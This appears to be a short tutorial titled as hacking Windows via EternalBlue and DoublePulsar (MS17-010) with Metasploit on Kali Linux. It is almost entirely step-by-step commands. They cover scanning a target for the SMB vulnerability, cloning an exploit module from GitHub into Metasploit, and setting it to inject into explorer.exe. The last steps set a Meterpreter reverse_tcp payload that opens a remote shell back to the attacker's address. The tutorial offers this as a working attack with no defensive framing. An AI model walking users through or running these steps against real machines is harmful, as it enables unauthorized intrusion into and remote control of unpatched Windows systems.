Hacking Windows using EternalBlue & DoublePulsar via Metasploit on Kali Linux 2017

 

This exploit is combination of two tools Eternal Blue which is use as backdooring in windows and Doublepulsar which is used for injecting dll file with the help of payload. So we will manually add this exploit in metasploit framework and set up the attack.

1 . Install wine

apt-get update
apt-get install wine

netdiscover

192.168.0.102 is my target

2. Use Metasploit to scan target for vulnerability

service postgresql start
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
options
set RHOSTS 192.168.0.102
exploit

3. Download and add eternalblue_doublepulsar to metasploit

cd Desktop/
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd Eternalblue-Doublepulsar-Metasploit
cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/


reload_all


use exploit/windows/smb/eternalblue_doublepulsar
options 


set DOUBLEPULSARPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
set ETERNALBLUEPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
options


set PROCESSINJECT explorer.exe
set RHOST 192.168.0.102
set TARGETARCHITECTURE x86


show targets
set target 9


set PAYLOAD windows/meterpreter/reverse_tcp
ifconfig
set LHOST 192.168.0.106

192.168.0.106 is my ip address

exploit

You can also see a demo

Hacking Windows using EternalBlue & DoublePulsar via Metasploit (MS17-010)